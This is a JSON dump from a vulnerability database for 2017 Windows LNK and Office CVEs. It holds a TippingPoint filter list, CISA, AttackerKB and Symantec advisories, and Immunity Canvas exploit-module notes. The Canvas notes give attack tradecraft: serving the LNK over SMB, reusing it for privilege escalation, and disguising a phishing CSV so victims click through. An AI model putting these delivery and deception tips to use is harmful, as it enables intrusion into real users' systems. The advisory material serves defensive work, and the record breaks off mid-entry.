Vendor Intelligence Provided \nCVE-2017-8470 | | No Vendor Intelligence Provided \nCVE-2017-8471 | | No Vendor Intelligence Provided \nCVE-2017-8472 | | No Vendor Intelligence Provided \nCVE-2017-8473 | | No Vendor Intelligence Provided \nCVE-2017-8474 | | No Vendor Intelligence Provided \nCVE-2017-8475 | | No Vendor Intelligence Provided \nCVE-2017-8476 | | No Vendor Intelligence Provided \nCVE-2017-8477 | | No Vendor Intelligence Provided \nCVE-2017-8478 | | No Vendor Intelligence Provided \nCVE-2017-8479 | | No Vendor Intelligence Provided \nCVE-2017-8480 | | No Vendor Intelligence Provided \nCVE-2017-8481 | | No Vendor Intelligence Provided \nCVE-2017-8482 | | No Vendor Intelligence Provided \nCVE-2017-8483 | | No Vendor Intelligence Provided \nCVE-2017-8484 | | No Vendor Intelligence Provided \nCVE-2017-8485 | | No Vendor Intelligence Provided \nCVE-2017-8487 | | No Vendor Intelligence Provided \nCVE-2017-8488 | | No Vendor Intelligence Provided \nCVE-2017-8489 | | No Vendor Intelligence Provided \nCVE-2017-8490 | | No Vendor Intelligence Provided \nCVE-2017-8491 | | No Vendor Intelligence Provided \nCVE-2017-8492 | | No Vendor Intelligence Provided \nCVE-2017-8493 | | No Vendor Intelligence Provided \nCVE-2017-8494 | | No Vendor Intelligence Provided \nCVE-2017-8496 | 28613 | \nCVE-2017-8497 | 28615 | \nCVE-2017-8498 | | No Vendor Intelligence Provided \nCVE-2017-8499 | | No Vendor Intelligence Provided \nCVE-2017-8504 | | No Vendor Intelligence Provided \nCVE-2017-8506 | | No Vendor Intelligence Provided \nCVE-2017-8507 | | No Vendor Intelligence Provided \nCVE-2017-8508 | | No Vendor Intelligence Provided \nCVE-2017-8509 | 28619 | \nCVE-2017-8510 | 28621 | \nCVE-2017-8511 | | No Vendor Intelligence Provided \nCVE-2017-8512 | | No Vendor Intelligence Provided \nCVE-2017-8513 | | No Vendor Intelligence Provided \nCVE-2017-8514 | | No Vendor Intelligence Provided \nCVE-2017-8515 | | No Vendor Intelligence Provided \nCVE-2017-8517 | | No Vendor Intelligence Provided \nCVE-2017-8519 | | No Vendor Intelligence Provided \nCVE-2017-8520 | | No Vendor Intelligence Provided \nCVE-2017-8521 | | No Vendor Intelligence Provided \nCVE-2017-8522 | | No Vendor Intelligence Provided \nCVE-2017-8523 | | No Vendor Intelligence Provided \nCVE-2017-8524 | 28622 | \nCVE-2017-8527 | | No Vendor Intelligence Provided \nCVE-2017-8528 | | No Vendor Intelligence Provided \nCVE-2017-8529 | | Insufficient Vendor Information \nCVE-2017-8530 | | No Vendor Intelligence Provided \nCVE-2017-8531 | | No Vendor Intelligence Provided \nCVE-2017-8532 | | No Vendor Intelligence Provided \nCVE-2017-8533 | | No Vendor Intelligence Provided \nCVE-2017-8534 | | No Vendor Intelligence Provided \nCVE-2017-8543 | 28629 | \nCVE-2017-8544 | | No Vendor Intelligence Provided \nCVE-2017-8545 | | No Vendor Intelligence Provided \nCVE-2017-8547 | 28611 | \nCVE-2017-8548 | | No Vendor Intelligence Provided \nCVE-2017-8549 | | No Vendor Intelligence Provided \nCVE-2017-8550 | | No Vendor Intelligence Provided \nCVE-2017-8551 | | No Vendor Intelligence Provided \nCVE-2017-8553 | | No Vendor Intelligence Provided \nCVE-2017-8554 | | No Vendor Intelligence Provided \nCVE-2017-8555 | | No Vendor Intelligence Provided \n \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28543: ZDI-CAN-4719: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28544: ZDI-CAN-4729: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28546: ZDI-CAN-4730: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28547: ZDI-CAN-4731: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28548: ZDI-CAN-4732: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Trend Micro (5)_**\n\n| \n\n * 28536: ZDI-CAN-4652: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28537: ZDI-CAN-4653: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28538: ZDI-CAN-4659: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28541: ZDI-CAN-4664: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28542: ZDI-CAN-4671,4675: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 28608: HTTPS: HPE Network Automation RedirectServlet SQL Injection Vulnerability (ZDI-17-331)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-5-2017/>).", "cvss3": {}, "published": "2017-06-16T12:00:40", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 12, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8461", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8506", "CVE-2017-8464", "CVE-2017-8508", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8513", "CVE-2017-8550", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-8545", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8507", "CVE-2017-8474", "CVE-2017-8487", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-8509", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8551", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8512", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8520", "CVE-2017-8519", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8511", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-8510", "CVE-2017-8514", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8534", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-16T12:00:40", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-12-2017/", "id": "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:19", "description": "**Name**| special_lnk \n---|--- \n**CVE**| CVE-2017-8464 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| special_lnk \n**Notes**| References: ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464', 'http://paper.seebug.org/357/', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] \nCVE Name: CVE-2017-8464 \nVENDOR: Microsoft \nNOTES: \n**DIALOG BOX** \nIn the dialog box, both remote and local paths can be specified in such a way \nthat the LNK and DLL-based callback can be hosted by Canvas. To make Canvas \nput the correct IP in for your own system, start the SMB path with \\HOSTLOCAL. \nOther names than HOSTLOCAL can be entered as well, but HOSTLOCAL will be replaced \nwith the IP that your callback is listening on. \n \nShould you want to create the LNK and DLL for distribution via other means, using \ndisk-paths such as C:\\users\\target\\callback.dll will work. \n \n**NOTE** : To reiterate: an LNK path starting with \\HOSTLOCAL will tell the \nmodule to host the LNK itself. If you do not want this to happen, simply specify \nan on-disk path. \n \nTested on: \n\\- Windows 10 (64 bit) with (local + remote) DLL path \n\\- Windows 8 (32 bit) with local DLL path \n\\- Windows 7 (32 bit) with (local + remote) DLL path \n \n**HIGHLY IMPORTANT NOTE** \nIn our testing, we have discovered that this exploit is not just a clientside. \nOn multiple Windows 10 x64 systems we have noticed that in certain repeatable \ncircumstances, SearchProtocolHost.exe, a SYSTEM-privileged process, will \nrender the LNK. This behavior has not been observed on Windows 7 or Windows 8. \n \n**In order to use this exploit as an LPE, just rename the original LNK after \nyou have a shell** \n \nWe have observed in our labs that using a UNC path that maps to a WebDAV share \nis incredibly slow regardless of the software behind the share. For this reason \nwe recommend the use of an SMB share for remote/clientside exploitation where \ndelivery of only the LNK is possible. \n \nSpecial thanks to Haifei Li and VXJump for their analysis. \n \nDate public: 06/27/2017 \nCVE Url: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464 \nCVSS: 7.5 \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "canvas", "title": "Immunity Canvas: SPECIAL_LNK", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-15T01:29:00", "id": "SPECIAL_LNK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/special_lnk", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:12", "description": "**Name**| office_wsdl \n---|--- \n**CVE**| CVE-2017-8759, CVE-2017-8570 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Microsoft Office Moniker/WSDL C# Injection \n**Notes**| CVE Name: CVE-2017-8759, CVE-2017-8570 \nVENDOR: https://office.com \nNotes: \nSend the resulting document to someone and have them open it. If the \ntarget is vulnerable, you will get a Powershell-MOSDEF shell. \n \nIMPORTANT NOTE: the WSDL server needs to listen on port 80. Even if \nthe URIs are updated with the correct port, the exploit will not \nsucceed. \n \nMOTW is defined as the \"Mark of the Web\". In the Windows Operating \nSystem, MOTW is an alternate datastream (whose name is Zone.Information) \nthat applications are supposed to apply to files that come from any \nuntrusted source. The ADS contains the name of the zone of the file's \norigination. It is used as a hint to applications that they should not \ntrust the file's contents. \n \nPPSX Notes \n\\---------------------------------------- \nIf this file is tagged with MOTW on the target machine, the exploit \nwill not work. This will happen if it is downloaded from a remote zone \nin IE, for example. If you cannot avoid MOTW, use CSV phishing method \nIn that case, the user is more likely to click the 'update content' \n(or 'edit content') prompt because that is both are not security \nwarnings, and the file format lends itself to editing. PPSX is a \nslideshow format, which is not intended to be edited and is not \ntreated as such in PowerPoint. However, if you can avoid MOTW, PPSX \nrequires no interaction whatsoever to work. \n \nYou can edit the PPSX (you may need to rename it to PPTX before opening \nit in Office) to contain different slide data. As of CEU time, it is \nbest to not edit the embedded file, as that is how the moniker is \nembedded. \n \nCSV Notes \n\\---------------------------------------- \nEdit the template .csv to contain realistic data. Otherwise, it will \nappear to be a blank CSV file upon first glance. If the target has a \ncomically large monitor, add more rows to make the '#N/A' appear on \na non-visable part of the screen. \n \n \nVulnerability Notes \n\\---------------------------------------- \nAs Haifei Li notes, there are two vulnerabilities at work: the moniker \nbinding issue (where \"binding an object to a moniker\" means \ndeserialization in Microsoft's lexicon) and the issue triggered by \ninstantiation of the class upon deserialization. \n \nNOTE: For reasons implied above, that there are multiple ways a target \ncould be patched against this issue: \na) .NET updates will close the bug in wsdlparser.cs that allows code \ninjection into the remoting class \nb) Office updates will disallow binding of the soap:wsdl moniker that \nis necessary to trigger the remoting code compilation \n \nTested Operating Systems: \n* Office 2013 (no patches) - Windows 7 32 bit \n \nRepeatability: Infinite \nReferences: ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759', 'https://twitter.com/buffaloverflow/status/908455053345869825', 'https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/', 'https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html', 'http://justhaifei1.blogspot.com/2017/07/bypassing-microsofts-cve-2017-0199-patch.html'] \nCVE URL: \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-13T01:29:00", "type": "canvas", "title": "Immunity Canvas: OFFICE_WSDL", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-13T01:29:00", "id": "OFFICE_WSDL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/office_wsdl", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Windows Shell in multiple versions of Microsoft Windows allows local users or remote attackers to execute arbitrary code via a crafted .LNK file", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Shell (.lnk) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-8464", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2022-02-25T00:00:00", "id": "CISA-KEV-CVE-2017-8570", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T20:12:19", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka \u201cLNK Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:12am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T00:00:00", "type": "attackerkb", "title": "CVE-2017-8464", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2020-07-30T00:00:00", "id": "AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460", "href": "https://attackerkb.com/topics/CESmJpn7xk/cve-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-19T08:14:06", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \u201cMicrosoft Office Remote Code Execution Vulnerability\u201d. This CVE ID is unique from CVE-2017-0243.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-8570", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2021-07-27T00:00:00", "id": "AKB:01414FF4-26B2-4222-97E5-C5371A16E182", "href": "https://attackerkb.com/topics/XSQs25OqBH/cve-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-18T11:09:24", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \u201cMicrosoft Office Remote Code Execution Vulnerability\u201d. This CVE ID is unique from CVE-2017-8570.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-0243", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2020-07-23T00:00:00", "id": "AKB:2D05FC62-63F8-468A-A143-8C876A7F9789", "href": "https://attackerkb.com/topics/dk52zcC1qD/cve-2017-0243", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:05:27", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "symantec", "title": "Microsoft Windows LNK CVE-2017-8464 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-13T00:00:00", "id": "SMNTC-98818", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98818", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:40", "description": "### Description\n\nMicrosoft Office is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 Service Pack 3 \n * Microsoft Office 2010 Service Pack 2 (32-bit editions) \n * Microsoft Office 2010 Service Pack 2 (64-bit editions) \n * Microsoft Office 2013 RT Service Pack 1 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-07-11T00:00:00", "type": "symantec", "title": "Microsoft Office CVE-2017-8570 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T00:00:00", "id": "SMNTC-99445", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99445", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-02-08T16:15:44", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 